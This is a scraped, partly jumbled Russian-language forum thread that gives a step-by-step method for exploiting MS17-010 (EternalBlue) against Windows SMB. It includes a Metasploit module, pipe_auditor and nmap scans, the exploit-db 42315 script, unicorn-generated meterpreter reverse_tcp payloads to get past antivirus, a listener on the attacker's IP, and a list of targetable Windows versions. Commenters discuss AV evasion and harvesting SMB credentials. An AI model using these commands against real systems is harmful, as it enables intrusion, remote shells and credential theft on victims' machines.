Или просто:
use exploit/windows/smb/ms17_010_psexec
use exploit/windows/smb/ms17_010_psexec
Следуйте инструкциям в видео ниже, чтобы узнать, как установить наш сайт как веб-приложение на главный экран вашего устройства.
Примечание: Эта функция может быть недоступна в некоторых браузерах.
https://www.exploit-db.com/exploits/42315/
https://github.com/worawit/MS17-010/blob/master/mysmb.py
https://github.com/trustedsec/unicorn
touch _init_.py
use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run
nmap -A -p 445 <ваша цель>
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload windows/meterpreter/reverse_tcp
exploit
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
Статья читается полностью. Тезисы со ссылками на разделы появятся позже.
У меня другая методика, я использую unicorn для обхода AV + показал как найти pipe + как достать креды smbИли просто:
use exploit/windows/smb/ms17_010_psexec
AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.У меня другая методика, я использую unicorn для обхода AV + показал как найти pipe
Как говорил @SooLFaaAV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.
Позвольте уточнить один момент: какое отношение к powershell имеет вот это?Как говорил @SooLFaa Посмотреть вложение 19038
Посмотреть вложение 19039
Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .
Ты действовал по моему методу?Позвольте уточнить один момент: какое отношение к powershell имеет вот это?
![]()
Нет, это просто изображение для наглядности.Ты действовал по моему методу?
Еще как умеет)) Предположительно, чтобы были пайпы на машине, должно быть включено сетевое обнаружение с гостевой учеткойразве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..
Статья понравилась )
а на 10 пойдет? написано протестировано ... - Windows 10 Pro Build 10240 x64
Это связка эксплойтов.Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое
Не соглашусь)И этот эксп уже бесполезен
Где связка ? Пример
Тебе лучше знать, куда уж мне)Что и требовалось понять что мамкин хекер до конца не поняв что это пытается думать мега хакер
Комментарии
41